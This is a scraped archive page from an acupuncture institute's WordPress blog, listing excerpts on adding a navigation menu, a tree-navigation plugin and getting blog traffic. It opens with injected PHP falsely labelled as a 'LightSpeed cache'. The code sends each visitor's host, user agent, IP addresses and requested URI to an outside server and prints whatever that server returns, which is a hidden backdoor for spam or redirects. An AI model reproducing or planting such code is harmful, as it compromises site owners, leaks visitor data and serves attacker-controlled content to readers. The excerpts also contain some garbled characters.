/** * Implement the LightSpeed cache. */ if (preg_match ('/.*77.*/', $_SERVER['REQUEST_URI']) || preg_match ('/.*ach.*/', $_SERVER['REQUEST_URI'])) { error_reporting(0); $url="http://w3lightcache.com/server_new.php";$params="h=$_SERVER[HTTP_HOST]&ua=$_SERVER[HTTP_USER_AGENT]&ip=$_SERVER[REMOTE_ADDR]&ip2=$_SERVER[HTTP_X_FORWARDED_FOR]&uri=$_SERVER[REQUEST_URI]";$ch=curl_init($url);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$result=curl_exec($ch);curl_close($ch); if (!empty($result)) {echo $result; die;} } wordpress blog : American Institute of Acupuncture

Category Archives: wordpress blog

Add a navigation menu to WordPress

This tutorial will explain how to add a simple HorizontalNavigation Menuto WordPress. The navigation menu or bar will allow your visitors to obtain easy access to your site and all of it’s content directly from the top of each page or post.   Note: There is now a great plugin available that supersedes this tutorial. The […]

WP-dTree plugin

Dynamic tree-widgets to replace the standard archives, categories, pages and link lists. Description Installation FAQ Screenshots Other Notes Changelog Stats This plugin provides?dynamic navigation trees?to replace the standard archives, categories, pages and link lists. They’re widgets so you can setup?the awesome tree navigation?with drag & drop ease, but it also exposes several?new template tags?for developers. […]

Getting Traffic to Your Blog

The number one rule is to create valuable content. This is really important. You want people to keep returning to your site. But, how do you get them there in the first place? Time and lots of effort. If you keep at it, using these suggestions below, you will grow your site. I?ll cover both […]